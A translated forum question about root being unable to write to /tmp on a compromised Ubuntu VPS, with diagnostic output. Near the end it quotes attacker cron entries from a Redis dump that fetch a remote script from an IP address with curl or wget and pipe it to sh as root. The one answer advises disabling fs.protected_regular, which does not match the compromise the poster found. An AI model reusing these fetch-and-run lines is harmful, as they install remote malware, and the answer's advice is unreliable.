为什么甚至我的 root 用户也无法在 /tmp 目录中写入?

tag-icon tag-icon ubuntu tmp
为什么甚至我的 root 用户也无法在 /tmp 目录中写入?

我无法在 /tmp 目录中写入内容。

以非 root 用户身份执行此操作:

europasprak@vps-xxxxxxxx:~$ echo 'ok' > /tmp/dummy
-bash: /tmp/dummy: Operation not permitted


europasprak@vps-xxxxxxxx:~$ sudo echo 'ok' | sudo tee /tmp/dummy
tee: /tmp/dummy: Operation not permitted

以及 root 用户:

root@vps-xxxxxxxx:~# echo 'ok' > /tmp/dummy
bash: /tmp/dummy: Operation not permitted

它甚至在询问sudo密码之前就拒绝了:

Last login: Wed Aug 18 19:38:33 2021 from 91.168.98.130
europasprak@vps-3506b083:~$ sudo echo 'ok' > /tmp/dummy2
-bash: /tmp/dummy2: Operation not permitted

有趣的是,它拒绝以 root 身份在以下命令中设置时间:

root@vps-xxxxxxxx:/home/europasprak# touch /tmp/ok
touch: setting times of '/tmp/ok': No such file or directory

这个问题今天早上就出现了。

该机器是:

europasprak@vps-xxxxxxxx:~$ uname -a
Linux vps-xxxxxxxx 5.8.0-63-generic #71-Ubuntu SMP Tue Jul 13 15:59:12 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

分区:

europasprak@vps-xxxxxxxx:~$ df
Filesystem     1K-blocks     Used Available Use% Mounted on
tmpfs             795424     1072    794352   1% /run
/dev/sda1      162420480 59362024 103042072  37% /
tmpfs            3977116        0   3977116   0% /dev/shm
tmpfs               5120        0      5120   0% /run/lock
tmpfs               4096        0      4096   0% /sys/fs/cgroup
/dev/sda15        106858     8008     98851   8% /boot/efi
overlay        162420480 59362024 103042072  37% /home/europasprak/programs/install/docker/overlay2/2f1f82255bbd13b61ea151363e46880c4902b4b822fca15078fb9a10461111df/merged

europasprak@vps-xxxxxxxx:~$ df -i
Filesystem       Inodes  IUsed    IFree IUse% Mounted on
tmpfs            994279    640   993639    1% /run
/dev/sda1      20643840 523620 20120220    3% /
tmpfs            994279      4   994275    1% /dev/shm
tmpfs            994279      3   994276    1% /run/lock
tmpfs              1024     18     1006    2% /sys/fs/cgroup
/dev/sda15            0      0        0     - /boot/efi

更多输出:

europasprak@vps-xxxxxxxx:~$ ls -ld /tmp
drwxrwxrwt 12 root root 4096 août  18 05:45 /tmp

europasprak@vps-xxxxxxxx:~$ lsattr /tmp
--------------e----- /tmp/dump.rdb
lsattr: Permission denied While reading flags on /tmp/systemd-private-b0ce13ad416741f3ba842d3821949044-systemd-timesyncd.service-11J2sh
lsattr: Permission denied While reading flags on /tmp/tmp.40xGrsPHCk
--------------e----- /tmp/exp_lin.so
--------------e----- /tmp/oi_plugins.php
--------------e----- /tmp/backup.db
lsattr: Permission denied While reading flags on /tmp/systemd-private-b0ce13ad416741f3ba842d3821949044-systemd-logind.service-ffm01g
lsattr: Permission denied While reading flags on /tmp/systemd-private-b0ce13ad416741f3ba842d3821949044-systemd-resolved.service-E7ECGg
--------------e----- /tmp/xm4.tgz
lsattr: Permission denied While reading flags on /tmp/snap.lxd

更新:我尝试安装acl但明显失败:

europasprak@vps-xxxxxxxx:~$ sudo apt install acl
Reading package lists... Error!
E: Unable to mkstemp /tmp/clearsigned.message.VjQNL9 - GetTempFile (1: Operation not permitted)
E: The package lists or status file could not be parsed or opened.
europasprak@vps-xxxxxxxx:~$ sudo apt update
Err:1 http://security.ubuntu.com/ubuntu groovy-security InRelease
  Temporary failure resolving 'security.ubuntu.com'
Err:2 https://download.docker.com/linux/ubuntu groovy InRelease
  Temporary failure resolving 'download.docker.com'
Err:3 http://ppa.launchpad.net/ultradvorka/ppa/ubuntu groovy InRelease
  Temporary failure resolving 'ppa.launchpad.net'
Err:4 http://nova.clouds.archive.ubuntu.com/ubuntu groovy InRelease
  Temporary failure resolving 'nova.clouds.archive.ubuntu.com'
Err:5 http://nova.clouds.archive.ubuntu.com/ubuntu groovy-updates InRelease
  Temporary failure resolving 'nova.clouds.archive.ubuntu.com'
Err:6 http://nova.clouds.archive.ubuntu.com/ubuntu groovy-backports InRelease
  Temporary failure resolving 'nova.clouds.archive.ubuntu.com'
Reading package lists... Error!
W: Failed to fetch http://nova.clouds.archive.ubuntu.com/ubuntu/dists/groovy/InRelease  Temporary failure resolving 'nova.clouds.archive.ubuntu.com'
W: Failed to fetch http://nova.clouds.archive.ubuntu.com/ubuntu/dists/groovy-updates/InRelease  Temporary failure resolving 'nova.clouds.archive.ubuntu.com'
W: Failed to fetch http://nova.clouds.archive.ubuntu.com/ubuntu/dists/groovy-backports/InRelease  Temporary failure resolving 'nova.clouds.archive.ubuntu.com'
W: Failed to fetch http://security.ubuntu.com/ubuntu/dists/groovy-security/InRelease  Temporary failure resolving 'security.ubuntu.com'
W: Failed to fetch https://download.docker.com/linux/ubuntu/dists/groovy/InRelease  Temporary failure resolving 'download.docker.com'
W: Failed to fetch http://ppa.launchpad.net/ultradvorka/ppa/ubuntu/dists/groovy/InRelease  Temporary failure resolving 'ppa.launchpad.net'
W: Some index files failed to download. They have been ignored, or old ones used instead.
E: Unable to mkstemp /tmp/clearsigned.message.cOHaS4 - GetTempFile (1: Operation not permitted)
E: The package lists or status file could not be parsed or opened.

更新:我也尝试过关闭一个设置,但是没有帮助:

europasprak@vps-xxxxxxxx:~$ sudo echo 'ok' > /tmp/dummy
-bash: /tmp/dummy: Operation not permitted
europasprak@vps-xxxxxxxx:~$ sudo sysctl fs.protected_regular=0  
[sudo] password for europasprak: 
fs.protected_regular = 0
europasprak@vps-xxxxxxxx:~$ sudo echo 'ok' > /tmp/dummy
-bash: /tmp/dummy: Operation not permitted

VPS 是一个 kvm 实例:

europasprak@vps-xxxxxxxx:~$ sudo virt-what
kvm

更新:

europasprak@vps-xxxxxxxx:~$ sudo journalctl --boot --priority=4
[sudo] password for europasprak: 
-- Logs begin at Thu 2021-04-01 18:46:32 UTC, end at Sun 2021-08-22 13:54:48 UTC. --
août 20 20:52:46 vps-3506b083 kernel:  #2
août 20 20:52:46 vps-3506b083 kernel:  #3
août 20 20:52:46 vps-3506b083 kernel: acpi PNP0A03:00: fail to add MMCONFIG information, can't access extended PCI configuration space under this bridge.
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: EISA: Cannot allocate resource for mainboard
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 1
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 2
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 3
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 4
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 5
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 6
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 7
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 8
août 20 20:52:46 vps-3506b083 kernel: sd 2:0:0:0: Power-on or device reset occurred
août 20 20:52:46 vps-3506b083 systemd[1]: /lib/systemd/system/plymouth-start.service:17: Unit configured to use KillMode=none. This is unsafe, as it disables>
août 20 20:52:46 vps-3506b083 systemd[1]: /lib/systemd/system/dbus.service:12: Unit configured to use KillMode=none. This is unsafe, as it disables systemd's>
août 20 20:52:46 vps-3506b083 systemd-udevd[413]: Could not set WakeOnLan of ens3 to off: Operation not supported
août 20 20:52:48 vps-3506b083 systemd-networkd[658]: /run/systemd/network/10-netplan-ens3.network: MTUBytes= in [Link] section and UseMTU= in [DHCP] section >
août 20 20:52:50 vps-3506b083 cron[702]: Error: bad minute; while reading /etc/crontab
août 20 20:52:50 vps-3506b083 cron[702]: Error: bad minute; while reading /etc/cron.d/zzh
août 20 20:52:50 vps-3506b083 cron[702]: Error: bad minute; while reading /etc/cron.d/dog
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '3' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '3' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '3' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '3' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '4' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '4' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '4' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '4' we don't know about, ignoring.
août 20 20:52:53 vps-3506b083 systemd-udevd[417]: testvxlan: Failed to get link config: No such device
août 20 20:52:53 vps-3506b083 systemd-udevd[417]: vx-001000-z6tjy: Failed to get link config: No such device
août 20 20:52:53 vps-3506b083 systemd-udevd[413]: vethe97279b: Could not generate persistent MAC: No data available
août 20 20:52:53 vps-3506b083 systemd-udevd[417]: vethe514997: Could not generate persistent MAC: No data available
août 20 20:52:53 vps-3506b083 systemd-networkd[658]: vethe97279b: Failed to wait for the interface to be initialized: No such device
europasprak@vps-3506b083:~$

更新:我发现我的 /etc/crontab 文件已被篡改。我的系统已被黑客入侵。奇怪的是,似乎没有任何挖矿活动。我想我需要完全重新安装系统。

REDIS0006þ^@^@^Gbackup3Ã@Q@X^G


*/4 * ^A^_root curl -fsSL http://199.19.22^T6.117/b2f628fff19fda9À^@^K/b.sh | sh

^@^Gbackup1@F


*/2 * * * * root cd1 -fsSL http://199.19.226.117/b2f628/b.sh | sh

^@^Gbackup4Ã@Q@X^G


*/5 * ^A^_root wd1 -q -O- http://199.19.22^T6.117/b2f628fff19fda9À^@^K/b.sh | sh

^@^Gbackup2@H


*/3 * * * * root wget -q -O- http://199.19.226.117/b2f628/b.sh | sh

ÿWìðr<90><93>^Gæ

答案1

这是 Ubuntu 20.04+ 中的标准行为,因为fs.protected_regularLinux 内核参数。您可以尝试这样禁用它

sudo sysctl fs.protected_regular=0

看看你是否可以写信给/tmp现在

如果您想使 fs.protected_regular=0 更改永久生效,请将其添加到 /usr/lib/sysctl.d/protect-links.conf 文件中。

相关内容